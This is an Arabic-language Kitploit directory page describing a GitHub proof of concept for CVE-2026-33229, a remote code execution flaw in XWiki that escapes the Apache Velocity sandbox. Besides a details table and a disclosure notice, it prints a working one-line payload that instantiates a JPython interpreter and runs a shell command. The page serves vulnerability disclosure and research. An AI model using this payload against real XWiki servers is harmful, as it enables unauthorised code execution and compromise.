Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33229 — إثبات مفهوم لاستغلال CVE-2026-33229، وهو ثغرة تنفيذ أوامر عن بُعد (RCE) في XWiki عبر تجاوز الحماية (sandbox) في Apache Velocity، مع تفاصيل تقنية وحمولة (payload) فعّالة. | Kitploit
أدوات/GitHubGitHub/azefzafyoussef/cve-2026-33229
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتطوير الحمولات
GitHubazefzafyoussef/cve-2026-33229

CVE-2026-33229

إثبات مفهوم لاستغلال CVE-2026-33229، وهو ثغرة تنفيذ أوامر عن بُعد (RCE) في XWiki عبر تجاوز الحماية (sandbox) في Apache Velocity، مع تفاصيل تقنية وحمولة (payload) فعّالة.

عرض المستودع
4منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-33229 — ثغرة تنفيذ الأوامر عن بُعد في XWiki عبر تجاوز حماية Apache Velocity Sandbox

CVE Severity Status

ثغرة تنفيذ أوامر عن بُعد في منصة XWiki تسمح لمستخدم مُصادق يمتلك صلاحيات البرمجة النصية بتجاوز حماية Apache Velocity sandbox بالكامل — دون الحاجة إلى Java Reflection — من خلال التنقل عبر الكائنات المُهيأة مسبقًا الموجودة بالفعل في سياق Velocity.

📄 التفاصيل التقنية الكاملة: youssefazefzaf.com/posts/cve


التفاصيل

الحقلالقيمة
معرّف CVECVE-2026-33229
المنتج المتأثرمنصة XWiki
المكوّنمُحرك عرض Velocity macros، معامل عنوان الصفحة
الصلاحيات المطلوبةمُصادق + صلاحية Script
التأثيرتنفيذ أوامر عن بُعد
GHSAGHSA-h259-74h5-4rh9
تاريخ الاكتشاف7 نوفمبر 2025
تاريخ التصحيح10 ديسمبر 2025
تاريخ الإفصاح8 أبريل 2026

إثبات المفهوم

root@kitploit:~
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')") 

إشعار الإفصاح المسؤول: تم نشر إثبات المفهوم بعد توفر التصحيح. لا تستخدمه ضد أنظمة لا تملكها.

تنزيل الأداة